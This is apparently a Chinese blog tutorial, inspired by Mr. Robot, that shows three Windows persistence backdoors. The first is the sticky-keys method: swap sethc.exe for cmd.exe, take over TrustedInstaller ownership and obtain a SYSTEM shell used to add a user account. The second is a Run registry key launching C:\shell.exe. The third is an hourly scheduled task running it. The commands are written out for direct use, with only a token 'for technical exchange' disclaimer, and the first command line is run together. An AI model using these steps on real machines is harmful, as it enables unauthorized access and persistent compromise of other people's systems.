来源:《MR.ROBOT》
不知该写什么内容了,再刷了遍《heike军团》内的片段拿来说一下吧!
粘滞键后门 在windows上连续按5次“Shift”,就可以调出粘滞键;
![d097776a3f206154602168fc747644c4.png](https://img-blog.csdnimg.cn/img_convert/d097776a3f206154602168fc747644c4.png)
粘滞键指的是电脑使用中的一种快捷键,专为同时按下两个或多个键有困难的人而设计的。粘滞键的主要功能是方便Shift等键的组合使用。粘滞键可以先按一个键位(如shift),再按另一键位,而不是同时按下两个键位,方便某些因身体原因而无法同时按下多键的人。一般的电脑连按五次shift会出现粘滞键提示;
使用如下命令:
cd c:windows\system32move sethc.exe sethc.exe.bakcopy cmd.exe sethc.exe
![483c58e9e34b1801c722705e7454ac88.png](https://img-blog.csdnimg.cn/img_convert/483c58e9e34b1801c722705e7454ac88.png)
如果目标机是 winvista 以上的,即 winvista 以后出的系统,修改 sethc 会提示需要 Trustedinstaller 权限,所以想要继续,那就需要修改所有者为Administrator,并修改其权限:
![9fc5cba78293e7d815b4066149d5fd30.png](https://img-blog.csdnimg.cn/img_convert/9fc5cba78293e7d815b4066149d5fd30.png)
然后修改为完全控制;
![f097c21547f156eeb764f4af5a60797e.png](https://img-blog.csdnimg.cn/img_convert/f097c21547f156eeb764f4af5a60797e.png)
![84e484003eaaa3681bff8186e74eaeb0.png](https://img-blog.csdnimg.cn/img_convert/84e484003eaaa3681bff8186e74eaeb0.png)
现在我们连续按下5次shift就弹出一个system权限的cmd;
![2f62f443cfdb86a9e1a194f870633c17.png](https://img-blog.csdnimg.cn/img_convert/2f62f443cfdb86a9e1a194f870633c17.png)
net user 账户名 密码 /add #添加一个带有密码的账户,登录新添加的账户即可访问该计算机
![4406f0dd23558acf0e905ce6af6e4ac9.png](https://img-blog.csdnimg.cn/img_convert/4406f0dd23558acf0e905ce6af6e4ac9.png)
注册表注入后门 在普通用户权限下,攻击者将会需要执行的后门程序或者脚本路径写到注册表;
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
键值可以任意设置,或者直接执行如下命令添加启动项 ;
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v test /t REG_SZ /d "C:\shell.exe"
当管理员重新登录系统时,就会执行后门程序;
计划任务后门 :
命令:schtasks /Create /tn Updater /tr c:\shell.exe /sc hourly /mo 1
以上的命令会在每小时执行一次shell.exe,在win7及以下的系统使用at命令代替schtasks。以上所有内容来源于网络,仅做技术交流,如侵权告知删除,点击查看免责声明!
![d8eb0839abca0eaa05ac117b869d51e3.png](https://img-blog.csdnimg.cn/img_convert/d8eb0839abca0eaa05ac117b869d51e3.png)